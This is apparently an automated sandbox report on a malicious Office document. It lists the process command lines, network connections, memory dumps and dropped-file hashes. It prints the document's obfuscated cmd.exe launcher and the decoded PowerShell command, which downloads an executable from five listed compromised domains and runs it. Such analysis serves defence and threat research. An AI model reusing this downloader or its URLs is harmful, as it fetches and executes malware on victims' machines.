_o/\\-\-___/-\_//o\-\/__/_---\/_\c//-_\__-/\\/\-_c\_/\/_-/_\--/-_/__\__-\\-/\-////-\//__/_--\-/_\:_--//_\_\\-\_/-p__-\\/-///_-\-_t\\--\/_/_-_/\-_t_--\\-/_-\_\_//h-/\_--_///\_\_-@_\//-/-__\\/\-_h//\\-_-__--\/\_e\-_/-\_/\-\/-_/o_\/-/__\\/\--/-/-\-_/_-_/\\-_\/s//-\\\//___-\-_u\/_\-/\-/--/__\.\-/-\/_\/__/\--z_-/--/\__\/\/\-i\/-_-_\\__-\/-/b\/_--\/_\--/__\u/-/\/--__/_-_\\s/\-\__-/_-/-\/_c\_-///_-_/-_\-\/_--//--/\\__\/_///\-/-__\\-\/_-:-_\-\/\//___--\p-_//\-\_--\/__/t\_/\_-\-/_/_\--t_/--_\--/\\\_//h_/_//-_\\\-\_-/@/_/---\/\_\__-/K_/\\-_/-\/-__-/a_/_\\_/---\/\_-/_--/\//--__\\\/t_\-/\_\-//_\/-_a-\/--_\/\\___-/p_\-_//--\/\/\-_m\-_\///-_\-_-_\o\/__--/--\_\_//c-\//_--_\\__-/\_///_--\/\\_\--_m_-\//-_/-_\/\-\o/___-\/\\\--/-/d-_//\\_\_-\-/-/n\//_-__/_\\/--\a/\_\/-_/--_-/_\r/--\__/-\-_\\///_/-/-/--_\_\_\\s/_-_-_\--\\\//_e-\-/_/_-_-/\/\\d\\-/\-_/\--___/u\__-/\_\//-\--_l_\-\/-\//_/__\-c--_\\_/_//\/_--n-_\\\_-__/\//--i\__--\-_////-\\----\\_/__/\-/\_p-\/_-\/___-\//-w/\_--/\\_-_/-_//_--\--\//___\//r/_/\-/-/_\-_\-\b__\/\//-_-_-\-/.-\/_-_//_\/-\-\m-//\-\__/-\-__/o_\\_///_-_-\\--c-_-__--//\_\\//.-////_\\_\--_\_o\-___\/\-/\--//i/-\-\\___\-///-d\\/_/-\_\//--_-a/_\\----///___\r__\-\\_///_--/-o/__-\_/-/-\/_\\d/_/\_---\\\/-_/s\//_-_\_--//_\\e/--\_\_\_-/_\-/u_/\-__\--\/\/_-q_\\-/-\_/\_/-/_a//\--_/-\-\__\/r\-\\//\-___-_-/c-_-_\_/\/-/_/\\//_\-/_\/-\-__/-/-\\__-/-_\//_/\:-\-/\/__//_\_-\p_-/__/_/-\\/\\-t/--_/\/-\__/\-_t-/-__\_\--\_//\h-/--\____\\-//\@/\-\-\/\_//-__-X\_\/-\-_-_\//-/0_\\-_-//\/\_-_/M\\-\-_\__-//-_/n___\_\-\-/\/--/E/\/-\-_\_//-_\_/\-\/-_\-/-___\/m-_-_/_\-\-//_/\o-/\__\_\/-/-/\_c-/\\/-_--_\/_\/.\\\_//-_//_---\e\/-\\-__/-/_/\_n//---__\\/\_\-_i\\_\_---///\_/_l__//_-\\--\_\-/n/-___/\-/_/-\\-o___--//-\\\-//\h/\-\/\__/-/-__-n-\\_\--_//-__//i\__-_\\-\--_///m/__/\-\_/\/\--_o_/\-_-\\__\-//-a_/-/\\\-/__\-/-b-\_-_/_-//_\\-//_/--/-\__/_/-\\//_-__-/-\\-/_\\:-__-\-\\//\//_-p\--/\-_/_-//_\_t-/_-\/_\\_\--//t-\//--_\_\\_//_h-//_\\\-\-___//'\_/_\/_-_-\-\/-=\-\\//\__/_/-_-O-__\_/-\_\-/-//V/-\____-\//-/-\h\/--_-/-/\\_/__$\\/_-_/\-/_/--_;__\/\-//\--__-/t-/_\-/\\_/__/\-n-\/\-/_\/-\_-_/e/---/_\_/-__\\/i\_/_-\\/\-/_-_/l-_\/\-/-/-__\\/C\__\//_\_----//b_-/-\_--\//__/\e-//_\\-/-\-\__/W//\/_\_\__-/-\-._-/__\-/-\-\_//t--_/\\--_//__\/e/\/\/-/_--\\_-_N__\-/\/-/\-/-_\ \//_-_/_--/\-\_t/\/\\/--_--_\/_c\//\__//-\\--_-e-/\-__-_\_/\-\/j-_\//_-\-/\_-\/b-__\\_/\/---_//o_\-/\__/-/-\-_\--_\/\_-\\/--/_/w__///_--_\\\\/-e_\--\__//-_\\/-n\_\/_---\/_\-//=/\/\\_/_/_-_--\j_/-_/-\/-\__\-/L_\-\-///-___\-/h_\_/_-///_---\\$_-\/_/\/-_-\-\_ _-_--/\\//-_/_\l/---/\/\\\/____l/---\_/\_-//__\e/-/\\_/--__/\_-h-_//\/-\\__-/-_s-/_-\_-_\\\-//_r/_/\/_\-/\-__--e-_\--/_//\\\-_/w//\___\/_\/----o\/__-_\-\\/-_/-p&& for /l %D IN ( 6143 ,-16 ,15) dO SEt .`=!.`!!~'{:~%D, 1!&& iF %D == 15 cAlL %.`:~ -384% "

C:\Windows\system32\cmd.exe

cmD.Exe /V:O /R " set ~'{=-_\--/_-///\\__ /__\\_\-_/-/-\/ _/_-/_-/-_\-/\\ \\--//_-\__/\-_ _\\_////\--_\-- \_/-__-\/_-\\/- \-\\_-/__///\-- /_\/-/-\_-\-/__ \-//_//_--\\_\_ _-\\-_-\///_/-_ _\-/-/_\/-\_/-_ \__\--////\\-__ -/\__/\/-\\-__/ -__/\\-/-_\\/-_ /---\\/\\/-___/ //_\-\/_--/_\_\ //_--\_\_-\/-_\ /\__\--/_/-\\-/}\\__//_//-\---\}-/\\\\/__--//_-{-_-\_//\--\/\_/h/\/-\_-/-/__\-_c_-_/__-/\/\\-\/t_-/\\/_-_-\/\/-a-/--_//\-\\\_/_c_\-/_\_/\--\//_}/-\_\\//_-\-__/;\//---\_/_/\_-_k-_-//\__/\\_/\-a\--_-\\/__/_-/\e/-__\\_--/\\/-_r/\---_\\//\___-b\__/\_/\/----\/;-\_///_-\-\_-_\i-_\/_--\\/\_/-_s__/\\_-/\/_-\/-w/\\-_-_/_--\/\/$_\--__/\/-/_\\- /\-_//\-\\/-__-s-/\_-/-\_\_/-\_s\\_/-__\_//-/-\e\/\-_-_\\///__-c\_\-_-\\_//-//_o/\/-/\/-_\_\--_r_/_-\/__\--\//-P\\_-\\-/-_/-_/_-\\--//\___/_/--t_-___\---/\///\r_//\_-\-/__/-\-a/_/\_\/-\-/-\-_t\/\//_--__\-/\-S_/_\/--\/\_--_\;\-__\_/\_/\/--/)/\--\-_//_\-__\i--\_/-\\/__/-/\s/\/-\\--\__//__w-_\-\-_/__/-\/\$/-/__\-\_\//-_- \__\_-_--//-\\/,__-_\_//-\//\-\z\\--\/-_/_-/__/W/-\//-\_/\\-___A_\__\//--/--/_\$///_\-__\\-\/-_(/_-_\_-\/\-\_-/e_/-\-\_-//\_-\_l\//\/_-_--\_/-_i/-__\\__-\\/--/F\---//__\\//-\_d\_/__\---/\-\//a/_-\\/_\/--\__-o-/-_/\-_/\\/-_\l\//-\_\_-/-\-/_n-__-\/\/-\/_/\-w_-/\/\-__\\-/-_o/-_-__/-\_\-/\/D-_-_/\\-/_/_/\-.\_\//-/--_\-/__j-//-_\_-/\/\\-_L--/\__\/-\_\_/-h\/-_/_--/__-/\\$_-_\/-\/\-_/_/\{/\-\\\//_-_/_--y_\__//\/_-\---\r/----/____\\\/\t\--//\/_/__-_\-{\\-/_-\\_/-/_-_)-/__-///\_-\\-_O\_/\--/-_-_/\_/V--__\\--\//_/_/h_/---\/_\-/\_\/$/_\/\//-__--\_- _\/_\--_\_/--/\n/\\-\-_-_/-\_//i\__\---/\//_\-_ \\\/\__-/_/--_/z\\_/-/-/\-_\/-_W_\_/\-_/-_-/\-\A\-///_/\__--\\_$-_-//_--\/\/\_\(_-/\\_--//-/\\_h/\__\//-_\--\/_c\_/_--_-_-\/\\/a_\/_//\-_/\_---e-\_/-_-_\\_\///r\/--_\/__\\//_-o-/_\\_-_//-_/\\f/_\-\\/-_\--//_;/_-_\__-\-/\/\/'-/\\-\__//-/_-\e\_\-/--//\-__/\x//\_/_--/-\_\-_e/\\//-_--_\-\_/.\_\//_--/-\\/__'_\/-_-_-///\\\_+/_\-\/_/-_-\\/-F-/\_-__\\/\--//J\\/__\-/\/_-/_-c//\\_-/-_-_-\/\$-/-\/\_-/__-\/_+/-\_\_-_/_/\/--'/-_-\\/\-\__/_-\\_--\\_-//\//_-'//\-_--/\-/\\__+-\_-\__\/_\//-/p/\/__\//\_-\--_m\\-_-/-\/__/-_\e-/__\\/-_-\/_-\t/-_-/-_/\\_/\-_://_\\\_---/\-_/v_\/\-\-/_/_\_--n\/-_\-_-//_/-\\e_/-\//\_-\--_/_$__-//\--_\_\/-\=/\-_\\-/_-/_/_-i/-\/_\-_-_\/-_\s--/_/-__-/\_\\/w__-/--\\-_//\/\$/\_/--/_/\__-\-;_/--/-_/-\\__/\'_-\//\_\-_-/-_/4-/-_-/_\\-\\/__7_--_/\_/-/-\\\/9\_/\_/----\__//'-/-/\/_\--__\/_ _/\/\-\_/-/-__\=_\_\_--\/--_//\ //_\/\_----/__\F_\_-__///\\/\--J_//-_//\--__\\-c_-\-__\//-\//_-$\_//__\-/_\/-\-;_/\//_-\_\\/_--)__/__-/-\\\-/\/'_\_///--/\-\-\_@\-/\/\_/-\-__-_'//\\\_--\-/__-_(/-/_/_-\\_\-\/-t--_\/\\-_\-///_i\_/-_/-\_/\-_\/l/-_//--\__\/_-\p\/\_\--_//_/_--S_-/\-\\-//-__\_.\-/_\--\/_/_/\_'_--\__//-/\/-\\C\--/\_-_\/\-/_/S/_\\\_/__\/--/-4\-\\\/_---___//6/-\/_/_-_\/\-\_K/-_-\__/-\/_\\/O\/--__\_//_/\--P/\_/_-//-\\__--M\\--_--\/_///_\/_/\/\___/\--/--m_/_-/_\\_\-/--\o-_\-/_/\_\-\_-/c__\/\_-\-_-/-//._//\_//\\_--\_-g-/\_/\-/\-_-_\/n_//\/-/-\_-_\\_i_\\---/\/-/\/__v__-/\//-_\-_\-/o_\_-/-/\-\/\_-/m_-/\/_\_/-\-/\-a_-\/_\/-_-//\_\l--\_\_\/_-\/-//l--___\-/\\/-//_e\_-__-/\--//\_\s\-/__-\/\-__-/\a/-__\/\/\/-\-_-c////_\-\_-\_-\_/-/__\\\\_-//-/_/-\//_\-\-/__-/\:__-/_\_---///\\p\\_//_-\--\__//t-//\--\/__\/\_-t-/-\_\\_//-_/-_h/-\-/\\__/-/_-\@-/_\//_\-_\-/\_6_\\/\---\/-_//_X_--\/\-///-___\1/__\\-/_-/\_-\-i\--\/_-/\\-/_/_f--\///_\/\\_-_-6/----_\__/\_\/\P_\\_-_\//_\/---/-//-/_\-\-_\_/\m\/\_/\//__-\_--o/\-\_-/\__\-_//c--_\_\_/-/-\//_.-/__\/__\\-//-\a-\_-/__-/\/\_-/i\_/\\_-///\_-_-d\_-\\-_//_\/_/-e\/_--//_/\_\-\_m_\\-__/\\//_-/-l/-\//\\-_--\___o/\\-\-___/-\_//o\-\/__/_---\/_\c//-_\__-/\\/\-_c\_/\/_-/_\--/-_/__\__-\\-/\-////-\//__/_--\-/_\:_--//_\_\\-\_/-p__-\\/-///_-\-_t\\--\/_/_-_/\-_t_--\\-/_-\_\_//h-/\_--_///\_\_-@_\//-/-__\\/\-_h//\\-_-__--\/\_e\-_/-\_/\-\/-_/o_\/-/__\\/\--/-/-\-_/_-_/\\-_\/s//-\\\//___-\-_u\/_\-/\-/--/__\.\-/-\/_\/__/\--z_-/--/\__\/\/\-i\/-_-_\\__-\/-/b\/_--\/_\--/__\u/-/\/--__/_-_\\s/\-\__-/_-/-\/_c\_-///_-_/-_\-\/_--//--/\\__\/_///\-/-__\\-\/_-:-_\-\/\//___--\p-_//\-\_--\/__/t\_/\_-\-/_/_\--t_/--_\--/\\\_//h_/_//-_\\\-\_-/@/_/---\/\_\__-/K_/\\-_/-\/-__-/a_/_\\_/---\/\_-/_--/\//--__\\\/t_\-/\_\-//_\/-_a-\/--_\/\\___-/p_\-_//--\/\/\-_m\-_\///-_\-_-_\o\/__--/--\_\_//c-\//_--_\\__-/\_///_--\/\\_\--_m_-\//-_/-_\/\-\o/___-\/\\\--/-/d-_//\\_\_-\-/-/n\//_-__/_\\/--\a/\_\/-_/--_-/_\r/--\__/-\-_\\///_/-/-/--_\_\_\\s/_-_-_\--\\\//_e-\-/_/_-_-/\/\\d\\-/\-_/\--___/u\__-/\_\//-\--_l_\-\/-\//_/__\-c--_\\_/_//\/_--n-_\\\_-__/\//--i\__--\-_////-\\----\\_/__/\-/\_p-\/_-\/___-\//-w/\_--/\\_-_/-_//_--\--\//___\//r/_/\-/-/_\-_\-\b__\/\//-_-_-\-/.-\/_-_//_\/-\-\m-//\-\__/-\-__/o_\\_///_-_-\\--c-_-__--//\_\\//.-////_\\_\--_\_o\-___\/\-/\--//i/-\-\\___\-///-d\\/_/-\_\//--_-a/_\\----///___\r__\-\\_///_--/-o/__-\_/-/-\/_\\d/_/\_---\\\/-_/s\//_-_\_--//_\\e/--\_\_\_-/_\-/u_/\-__\--\/\/_-q_\\-/-\_/\_/-/_a//\--_/-\-\__\/r\-\\//\-___-_-/c-_-_\_/\/-/_/\\//_\-/_\/-\-__/-/-\\__-/-_\//_/\:-\-/\/__//_\_-\p_-/__/_/-\\/\\-t/--_/\/-\__/\-_t-/-__\_\--\_//\h-/--\____\\-//\@/\-\-\/\_//-__-X\_\/-\-_-_\//-/0_\\-_-//\/\_-_/M\\-\-_\__-//-_/n___\_\-\-/\/--/E/\/-\-_\_//-_\_/\-\/-_\-/-___\/m-_-_/_\-\-//_/\o-/\__\_\/-/-/\_c-/\\/-_--_\/_\/.\\\_//-_//_---\e\/-\\-__/-/_/\_n//---__\\/\_\-_i\\_\_---///\_/_l__//_-\\--\_\-/n/-___/\-/_/-\\-o___--//-\\\-//\h/\-\/\__/-/-__-n-\\_\--_//-__//i\__-_\\-\--_///m/__/\-\_/\/\--_o_/\-_-\\__\-//-a_/-/\\\-/__\-/-b-\_-_/_-//_\\-//_/--/-\__/_/-\\//_-__-/-\\-/_\\:-__-\-\\//\//_-p\--/\-_/_-//_\_t-/_-\/_\\_\--//t-\//--_\_\\_//_h-//_\\\-\-___//'\_/_\/_-_-\-\/-=\-\\//\__/_/-_-O-__\_/-\_\-/-//V/-\____-\//-/-\h\/--_-/-/\\_/__$\\/_-_/\-/_/--_;__\/\-//\--__-/t-/_\-/\\_/__/\-n-\/\-/_\/-\_-_/e/---/_\_/-__\\/i\_/_-\\/\-/_-_/l-_\/\-/-/-__\\/C\__\//_\_----//b_-/-\_--\//__/\e-//_\\-/-\-\__/W//\/_\_\__-/-\-._-/__\-/-\-\_//t--_/\\--_//__\/e/\/\/-/_--\\_-_N__\-/\/-/\-/-_\ \//_-_/_--/\-\_t/\/\\/--_--_\/_c\//\__//-\\--_-e-/\-__-_\_/\-\/j-_\//_-\-/\_-\/b-__\\_/\/---_//o_\-/\__/-/-\-_\--_\/\_-\\/--/_/w__///_--_\\\\/-e_\--\__//-_\\/-n\_\/_---\/_\-//=/\/\\_/_/_-_--\j_/-_/-\/-\__\-/L_\-\-///-___\-/h_\_/_-///_---\\$_-\/_/\/-_-\-\_ _-_--/\\//-_/_\l/---/\/\\\/____l/---\_/\_-//__\e/-/\\_/--__/\_-h-_//\/-\\__-/-_s-/_-\_-_\\\-//_r/_/\/_\-/\-__--e-_\--/_//\\\-_/w//\___\/_\/----o\/__-_\-\\/-_/-p&& for /l %D IN ( 6143 ,-16 ,15) dO SEt .`=!.`!!~'{:~%D, 1!&& iF %D == 15 cAlL %.`:~ -384% "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell $hLj=new-object Net.WebClient;$hVO='http://baominhonline.com/EnM0X@http://craquesdoradio.com.br/wp-includes/random_compat/aK@http://csubiz.us/oeh@http://ccoolmedia.com/P6fi1X6@http://casellamoving.com/MPOK64SC'.Split('@');$cJF = '974';$wsi=$env:temp+'\'+$cJF+'.exe';foreach($AWz in $hVO){try{$hLj.DownloadFile($AWz, $wsi);Start-Process $wsi;break;}catch{}}

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4332,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=3976 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 240.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 baominhonline.com udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 craquesdoradio.com.br udp
US 8.8.8.8:53 csubiz.us udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.161:443 www.bing.com tcp
US 8.8.8.8:53 ccoolmedia.com udp
US 8.8.8.8:53 casellamoving.com udp
US 76.223.105.230:80 casellamoving.com tcp
US 8.8.8.8:53 161.61.62.23.in-addr.arpa udp
US 76.223.105.230:443 casellamoving.com tcp
US 8.8.8.8:53 230.105.223.76.in-addr.arpa udp
US 8.8.8.8:53 73.239.69.13.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
NL 23.62.61.184:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
NL 104.97.14.241:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 184.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 241.14.97.104.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp

Files

memory/1400-4-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/1400-2-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp

memory/1400-7-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp

memory/1400-6-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp

memory/1400-5-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/1400-3-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp

memory/1400-1-0x00007FFDF258D000-0x00007FFDF258E000-memory.dmp

memory/1400-0-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp

memory/1400-8-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/1400-9-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/1400-10-0x00007FFDAFC40000-0x00007FFDAFC50000-memory.dmp

memory/1400-11-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/1400-14-0x00007FFDAFC40000-0x00007FFDAFC50000-memory.dmp

memory/1400-13-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/1400-12-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/1400-33-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/1400-42-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/1400-41-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/1400-44-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/1400-45-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/1400-47-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/1400-46-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/1400-40-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/1400-43-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/3956-51-0x00000257F8390000-0x00000257F83B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hqw43bwr.4uu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1400-68-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TCD27E0.tmp\gb.xsl

MD5 51d32ee5bc7ab811041f799652d26e04
SHA1 412193006aa3ef19e0a57e16acf86b830993024a
SHA256 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

memory/1400-537-0x00007FFDF258D000-0x00007FFDF258E000-memory.dmp

memory/1400-538-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/1400-548-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/1400-549-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/1400-550-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/1400-551-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp

memory/1400-570-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp

memory/1400-571-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp

memory/1400-572-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp

memory/1400-569-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp

memory/1400-573-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp